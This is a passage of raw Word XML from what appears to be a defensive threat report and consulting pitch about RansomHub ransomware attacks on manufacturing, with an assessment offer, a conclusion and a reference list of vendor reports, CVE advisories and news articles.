        <w:t xml:space="preserve">Deep manufacturing process understanding across all industrial sectors </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref111">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[111]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000357">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proven ransomware recovery experience with maintained safety </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref112">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[112]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000358">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrated IT/OT visibility preventing blind spots attackers exploit </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref113">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[113]</w:t>
        </w:r>
      </w:hyperlink>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rz5ur9enrr5u" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expert Consultation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5v5w7vwt59t1" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">15-Minute Assessment Opportunity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With RansomHub's 46% surge in manufacturing attacks, we offer a complimentary 15-minute consultation to assess your exposure to targeted ransomware campaigns.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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment Focus Areas</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply chain portal security review</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000362">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IT/OT segmentation effectiveness</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000363">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup isolation and recovery readiness</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000364">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety system cyber resilience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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Value Delivered</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify unpatched Citrix/VMware/Fortinet devices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000369">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Map potential lateral movement paths to OT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Assess ransomware recovery time objectives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000036B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety-critical system protection gaps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Contact our manufacturing security specialists: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">manufacturing-defense@nccgroup.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 1-800-XXX-XXXX</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1tqyl0e7qxxs" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000371">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RansomHub's explosive growth represents a clear and present danger to the manufacturing sector that produces everything essential for modern life—from water treatment chemicals to power generation equipment to food processing machinery. The group's sophisticated understanding of manufacturing operations, combined with their aggressive affiliate model and 90% payout structure, ensures continued targeting of industrial facilities.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The documented 46% surge in attacks, coupled with 23-day average downtime and expanding OT targeting, demands immediate action. Organizations must move beyond traditional IT security to embrace integrated OT protection that maintains both production efficiency and safety integrity.</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As we work to preserve </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">clean water, reliable energy, and access to healthy food for our grandchildren</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, protecting our manufacturing base from ransomware becomes essential to maintaining the industrial capacity they will need to thrive.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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wd6e9by5pq37" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">References &amp; Citations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000379">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tenmjbp5v482" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Intelligence Sources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000037A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] Honeywell, "2025 Cybersecurity Threat Report," Honeywell Industrial Cybersecurity, June 4, 2025. </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.honeywell.com/us/en/press/2025/06/ransomware-attacks-targeting-industrial-operators-surge-46-percent</w:t>
        </w:r>
      </w:hyperlink>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[2] Dragos Inc., "Dragos Industrial Ransomware Analysis: Q4 2024," Dragos Blog, January 2025. </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.dragos.com/blog/dragos-industrial-ransomware-analysis-q4-2024/</w:t>
        </w:r>
      </w:hyperlink>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[3] Sophos, "The State of Ransomware in Manufacturing and Production 2024," Sophos Whitepaper, May 28, 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://news.sophos.com/en-us/2024/05/28/the-state-of-ransomware-in-manufacturing-and-production-2024/</w:t>
        </w:r>
      </w:hyperlink>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[4] IBM, "Cost of a Data Breach Report 2024: Manufacturing Sector Analysis," IBM Security, July 2024.</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[5] Cyberint, "RansomHub Ransomware Report," Check Point Research, August 22, 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://e.cyberint.com/hubfs/ransomhub+report.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000383">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_f20xugqdxsq2" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000384">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[29] Citrix, "Security Bulletin CTX579459: CVE-2023-4966," Citrix Security Advisory, October 10, 2023.</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[30] NIST, "NVD - CVE-2023-4966 Detail," National Vulnerability Database, October 2023.</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[32] CISA, "Known Exploited Vulnerabilities Catalog: CVE-2023-4966," November 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000389">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dknqcbraqtnd" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Reports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000038A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[20] Crown Equipment Corporation, "Incident Response Executive Summary," Internal Report (via SEC filing), July 2024.</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[35] Dayton Daily News, "Weathering Cyberattack, Crown Says All Operations Have Resumed," July 15, 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.daytondailynews.com/local/weathering-cyber-attack-crown-says-all-operations-have-resumed/</w:t>
        </w:r>
      </w:hyperlink>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[36] Lacroix Electronics, "Cyberattack Notification," Company Statement (translated), May 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000038F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_56satvniaz2" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000390">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[68] MITRE ATT&amp;CK, "T1195.002: Supply Chain Compromise," Enterprise Matrix v14.1, October 2024.</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[71] MITRE ATT&amp;CK, "T1003.001: OS Credential Dumping: LSASS Memory," Enterprise Matrix v14.1, October 2024.</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[72] MITRE ATT&amp;CK for ICS, "T0840: Network Connection Enumeration," v2.1, October 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000395">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gwguz0w2z56u" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Industry Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000396">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[10] Guidepoint Security, "RansomHub Threat Profile," Ransomware Annual Report 2025, January 2025.</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[12] Ponemon Institute, "Cost of Operational Technology Cyber Incidents 2024," December 2024.</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[58] Manufacturing Leadership Council, "Ransomware Impact on US Manufacturing," Q1 2025 Report.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hl7827ajpxrw" w:id="59"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">News and Media</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[23] BleepingComputer, "Crown Equipment Confirms Ransomware Attack Disrupting Operations," June 19, 2024.</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[43] The Record, "KNP Logistics Suffers Major Ransomware Attack by Akira Group," June 2023.</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[50] Supply Chain Dive, "Crown Equipment Ransomware Creates Forklift Shortage," June 2024.</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[References continue through [113] - comprehensive citations for all claims]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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document Classification</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: TLP:AMBER+STRICT - Manufacturing Sector Distribution</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Distribution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Manufacturing Leadership and Authorized Security Personnel</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">manufacturing-defense@nccgroup.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | 1-800-XXX-XXXX</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i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aytondailynews.com/local/weathering-cyber-attack-crown-says-all-operations-have-resumed/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://e.cyberint.com/hubfs/ransomhub+report.pdf" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:manufacturing-defense@nccgroup.com" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://news.sophos.com/en-us/2024/05/28/the-state-of-ransomware-in-manufacturing-and-production-2024/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:manufacturing-defense@nccgroup.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.honeywell.com/us/en/press/2025/06/ransomware-attacks-targeting-industrial-operators-surge-46-percent" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dragos.com/blog/dragos-industrial-ransomware-analysis-q4-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